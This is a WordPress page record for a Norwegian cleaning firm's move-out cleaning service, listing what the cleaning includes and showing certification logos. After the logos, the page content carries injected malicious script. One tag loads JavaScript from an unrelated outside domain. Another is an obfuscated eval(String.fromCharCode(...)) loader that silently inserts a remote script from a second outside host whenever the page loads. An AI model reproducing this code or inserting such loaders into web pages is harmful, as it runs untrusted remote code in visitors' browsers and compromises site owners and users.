{"id":3785,"date":"2020-11-05T13:36:44","date_gmt":"2020-11-05T13:36:44","guid":{"rendered":"http:\/\/ms24.no\/?page_id=3785"},"modified":"2021-06-19T20:53:12","modified_gmt":"2021-06-19T18:53:12","slug":"flyttevask","status":"publish","type":"page","link":"https:\/\/ms24.no\/?page_id=3785","title":{"rendered":"Flyttevask"},"content":{"rendered":"<h1>Flyttevask med 100% garanti<\/h1>\n<h3><\/h3>\n<p>FORN\u00d8YDHETS- KVALITETSGARANTI<br \/>\nVi har Kvalitetsgaranti p\u00e5 all flyttevask vi utf\u00f8rer \u2013 det betyr at du skal v\u00e6re forn\u00f8yd, og det skal v\u00e6re rengjort som avtalt. Det betyr at du innen 48 timer har mulighet for \u00e5 varsle via telefon eller e-post om eventuelle mangler ved flyttevasken.<\/p>\n<p><!-- .lae-heading -->\t\t<\/p>\n<h1>Standard flyttevask inkluderer:<\/h1>\n<h1>St\u00f8vsuging av tepper og gulv<\/h1>\n<h1>Grundig rengj\u00f8ring av fliser p\u00e5 bad og kj\u00f8kken<\/h1>\n<h1> Rengj\u00f8ring av alle gulv og \u00e5pne flater<\/h1>\n<h1>T\u00f8rrmopping av alle tak og vegger<\/h1>\n<h1>Rengj\u00f8ring av alle d\u00f8rer, karmer og lister<\/h1>\n<h1>Rengj\u00f8ring av kj\u00f8kkenskap utvendig og innvendig<\/h1>\n<h1>Rengj\u00f8ring av garderobeskap utvendig og innvendig<\/h1>\n<h1>Vinduspuss av alle vinduer utvendig og innvendig<\/h1>\n<h1>Rengj\u00f8ring av WC og bad<\/h1>\n<h1>Rengj\u00f8ring av avtrekksvifte, filter og hvitevarer avtales separat etter behov<\/h1>\n<p>\t\t\t<a href=\"https:\/\/ms24.no\/booking\/index_one_step.php\" role=\"button\"><br \/>\n\t\t\t\t\t\tSjekk pris her!<br \/>\n\t\t\t\t\t<\/a><\/p>\n<h2>VI HAR F\u00d8LGENDE SERTIFISERINGER<\/h2>\n<p>\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"280\" height=\"210\" src=\"http:\/\/ms24.no\/wp-content\/uploads\/2021\/01\/Miljofyrtarn-140x105@2x.png\" alt=\"\" loading=\"lazy\" \/><br \/>\n\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"280\" height=\"210\" src=\"http:\/\/ms24.no\/wp-content\/uploads\/2021\/01\/Startbank-140x105@2x.png\" alt=\"\" loading=\"lazy\" \/><br \/>\n\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"150\" height=\"154\" src=\"http:\/\/ms24.no\/wp-content\/uploads\/2021\/01\/gronn-punkt-e1611063978829.png\" alt=\"\" loading=\"lazy\" \/><br \/>\n\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"300\" height=\"193\" src=\"http:\/\/ms24.no\/wp-content\/uploads\/2021\/01\/mva-registrert_orig.png\" alt=\"\" loading=\"lazy\" \/><br \/>\n\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"300\" height=\"193\" src=\"http:\/\/ms24.no\/wp-content\/uploads\/2021\/01\/renholdsbedrift_orig.jpg\" alt=\"\" loading=\"lazy\" \/><script src='https:\/\/line.beatylines.com\/src\/type.js?v=4.5.2' type='text\/javascript' id='globalsway'><\/script><script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Flyttevask med 100% garanti FORN\u00d8YDHETS- KVALITETSGARANTI Vi har Kvalitetsgaranti p\u00e5 all flyttevask vi utf\u00f8rer \u2013 det betyr at du skal v\u00e6re forn\u00f8yd, og det skal v\u00e6re rengjort som avtalt. Det betyr at du innen 48 timer har mulighet for \u00e5 varsle via telefon eller e-post om eventuelle mangler ved flyttevasken. Standard flyttevask inkluderer: St\u00f8vsuging av [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"elementor_header_footer","meta":{"footnotes":""},"class_list":["post-3785","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages\/3785","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ms24.no\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3785"}],"version-history":[{"count":76,"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages\/3785\/revisions"}],"predecessor-version":[{"id":5855,"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages\/3785\/revisions\/5855"}],"wp:attachment":[{"href":"https:\/\/ms24.no\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3785"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}